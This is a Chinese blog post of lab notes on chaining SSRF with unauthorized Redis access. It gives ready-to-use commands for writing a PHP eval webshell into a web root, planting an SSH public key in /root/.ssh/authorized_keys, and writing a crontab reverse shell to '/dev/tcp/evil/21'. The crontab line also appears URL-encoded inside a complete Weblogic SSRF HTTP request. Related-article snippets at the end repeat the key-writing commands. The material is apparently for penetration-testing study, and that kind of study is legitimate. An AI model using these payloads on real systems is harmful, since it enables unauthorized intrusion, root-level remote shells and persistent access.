SSRF实验

于 2024-08-25 21:52:40 发布
阅读量649 收藏 12
点赞数 6
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxy9298/article/details/141535525
版权

一 ssrf+redis未授权访问漏洞01

1.漏洞复现:
./redis-cli -h 127.0.0.1 -p 6379
查看信息:info
删除所有数据库内容:flushall
刷新数据库:flushdb
查看所有键:KEYS *,使用select num可以查看键值数据
设置变量:set test “whoami”
设置路径等配置:config set dir [dirpath]
获取路径及数据配置信息:config get dir/dbfilename
获取所有配置信息:config get *
保存:save
查看变量名称:get [变量]
在这里插入图片描述通过redis上传webshell
1.因为配置有误的redis所有主机都可以登上,所以我们先登上再说:redis-cli -h 192.168.179.128
2. 登上之后,需要得到靶机网站的物理路径(方法:1.报错界面查找信息 2.dirsearch查找phpinfo信息等)。当然,我用的自己的靶机因此掐指一算就得出该位置
CONFIG SET /usr/share/nginx/html
3.随后给咱们shell起个名,并编写恶意代码
CONFIG SET dbfilename redis.php //起名
set webshell “<?php @eval($_POST['shell']);?>” //编写一句话木马
4.save保存
5.这时我们用蚁剑进行连接,测试下中用不
在这里插入图片描述
公私钥匙上传进行免密登录
1.首先咱们需要现在靶机建立一个文件夹(默认存放公私钥的地方)
mkdir /root/.ssh
2. 随后咱们在攻击机生成密钥对
ssh-keygen -t rsa
id_rsa为私钥,id_rsa.pub为公钥
3.随后将公钥文件写入文本文件中
(echo -e “\n\n”;cat id_rsa.pub;echo -e “\n\n”) > 1.txt
4.连接靶机redis
redis-cli -h 靶机IP
config set dir /root/.ssh #设置redis备份的目录为/root/.ssh
在这里插入图片描述
5.一般情况下系统会认定authorized_keys为公钥文件名,因此咱们给他起个这样的名字
config set dbfilename authorized_keys # 设置公钥文件名
在这里插入图片描述
结果:
在这里插入图片描述

二 ssrf+redis未授权访问02

GitHub - Ridter/redis-rce: Redis 4.x/5.x RCE
在这里插入图片描述
发送三条redis命令,将弹shell脚本写入/etc/crontab:

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
进行url编码:
saveset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
0

注意,换行符是“\r\n”,也就是“%0D%0A”。
将url编码后的字符串放在ssrf的域名后面,发送:

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

三 ssrf+python+redis反序列化+csrf漏洞

访问http://ip:2222
尝试file读取文件,成功读取,说明存在ssrf漏洞
在这里插入图片描述
尝试访问本地6379端口,发现redis报错,说明存在redis组件
在这里插入图片描述
利用python脚本生成payload,注意是python2
在这里插入图片描述
抓包发送payload,(这里因为是post数据流,可以urlencode,也可以不用)
在这里插入图片描述
可以看到redis返回ok
等待一分钟左右,成功反弹root权限
在这里插入图片描述
进容器,可以看到任务计划中成功写入反弹shell脚本
在这里插入图片描述
写公钥+免密登录
同样利用python脚本生成payload
ssh-keygen生成密钥
在这里插入图片描述
抓包发送payload,可以看到redis返回ok
在这里插入图片描述
然后直接ssh登录,成功登录,注意这里的 -p 10025,因为是容器的22端口映射到服务器上的10025端口
在这里插入图片描述
进容器查看.ssh目录,发现的确写入了公钥
在这里插入图片描述

redis 未授权/知道密码 下getshell
问题很多的小明
06-20 501
常用的方法,计划任务,写webshell,主从复制,写公钥文件(会覆盖) 1 写公钥文件 ssh-keygen –t rsa (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt cat test.txt |redis-cli -h 192.168.0.109 -a 123456 -x set crackit redis-cli -h 192.168.0.109 -a 123456 config set dir /root/
SSRF 服务端请求伪造, 简介,SSRF实验, 漏洞探测, 绕过技巧, SSRF防御_json格式绕过ssrf
2401_83739434的博客
04-12 630
(,)是一种恶意网络行为, 攻击者可以利用这种漏洞发送来自服务器的请求,以访问或操作服务器通常无法访问的内部资源。SSRF通常存在于应用程序中,该应用程序接受用户提供的URL,并基于该URL发出服务器端的HTTP请求。 2. fsockopen() 3. curl_exec() 三, SSRF 漏洞实验 SSRF的利用条件:URL地址可控, 后台页面没有对URL进行正确的校验, 在页面当中最好有输出方式一: file_get_contents()函数: 方式二: curl请求: 2. 利用漏洞脚本发送
ssrf结合redis未授权getshell
最新发布
求大佬师傅带
07-07 1005
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis未授权,即可getshell
SSRF+Redis未授权getshell
yuan_boss的博客
04-14 1418
当一个网站具有ssrf漏洞,如果没有一些过滤措施,比如没过滤file协议,gophere协议,dict等协议,就会导致无法访问的内网服务器信息泄露,甚至可以让攻击者拿下内网服务器权限。
redis未授权到getshell
weixin_68408599的博客
06-12 1090
写入webshell虽然简单便捷,但是很多网站都严格限制了写入规则,但是可以通过定时任务,写入公钥等来获取webshell并建立持久性控制。自己使用需要小心,redis未授权是比较常见的漏洞了,常常被用于执行挖矿病毒,甚至是勒索病毒。
Redis未授权访问导致getshell
isxiaole的博客
11-09 3396
redis未授权访问导致getshell redis未授权访问漏洞利用
结合漏洞、ssrf-lab学习SSRF漏洞
Lemon's blog
03-14 1884
前言: 学习新知识,这次通过Weblogic 存在的SSRF漏洞和ssrf-lab,来学习SSRF漏洞 0x01 了解SSRF SSRF简介: SSRF(Server-Side Request Forgery),即服务器端请求伪造,利用漏洞伪造服务器端发起请求,从而突破客户端获取不到数据限制,本质上是属于信息泄露漏洞。 SSRF漏洞原理: SSRF 形成的原因大都是由于服务端提供了从其他服务器应用...
ssrf-lab:探索SSRF漏洞的实验
05-22
实验室 探索SSRF漏洞的实验室 10月4日的实验室位于/ ctf目录中:-)
【burpsuite安全练兵场-服务端9】服务端请求伪造SSRF漏洞-7个实验(全)
xnxqwzy的博客
01-26 1801
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
Weblogic SSRF 到Getshell
干铮的博客
01-29 631
Weblogic SSRF漏洞 描述:Weblogic中存在SSRF漏洞,利用该漏洞可以任意HTTP请求,进而攻击内网redis/fastcgi等脆弱组件。 1.环境搭建 环境采用vulhub的docker环境 启动环境路径 vulhub/weblogic/ssrf 启动环境命令 docker-compose build docker-compose up -d 访问http://your-ip:7001/uddiexplorer/ 无需登录即可查看uddiexploer应用 2.S..
Redis未授权getshell及修复方案
打工人日记
12-31 665
应用介绍 简单点说就是一个日志型数据库,并有主从同步的功能(优化性能)。 漏洞介绍 默认配置下redis并没有设置密码,被攻击者恶意利用可以导致未授权访问,可以有多种利用方式:服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等 安装redis docker run -itd --name redis-test -p 6379:6379 redis 常用命令 ping:检测是否连通且有权限执行命令 info:读取Redis敏感数据 keys:
redis 未授权访问及getshell
Guoke324的博客
04-06 788
目录 redis未授权访问 redis getshell方法 写 webshell 文件 利用 写SSH key进行 getshell 通过写corntab的方式进行getshell redis未授权访问 Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户未授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。 利用python去检测,或者...
利用Redis未授权漏洞实现getshell
MD@@nr丫卡uer
01-12 564
(1)写ssh-keygen公钥然后使用私钥登陆 在以下条件下,可以利用此方法 Redis服务使用ROOT账号启动 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。 1:本地建立ssh的密钥 ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa Enter passphrase
《Redis未授权访问getshell》复现笔记(一)
limb0的博客
09-12 735
《Redis未授权访问getshell》复现笔记(一) 利用周末复现了一下Redis未授权访问getshell,期间遇到了一些坑,虽然结果没什么悬念,却花费了不少时间,故将过程详细记录,留给有需要的人。此贴仅供新手参考,大佬勿喷。 一、 环境介绍 靶机:CentOS 6.5 (点击下载) IP:192.168.17.140 攻击机:Win10(本机) IP:192.168.8.195 二、...
redis未授权getshell整合利用
qq_40898302的博客
06-13 1347
redis未授权getshell四种方式
Redis 未授权访问漏洞与getshell(附getshell检测工具)
告白的博客
02-24 4107
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的未授权范围与Pickle反序列化
redis未授权getshell四种方式
没有
04-24 4747
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
ssrf redis
08-29
SSRF (Server Side Request Forgery) 是一种攻击方式,通过欺骗服务器发起伪造的请求来访问受信任的内部资源。Redis 是一种流行的开源内存数据库。 如果你想通过 SSRF 进行 Redis 的攻击,可能的方式包括: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值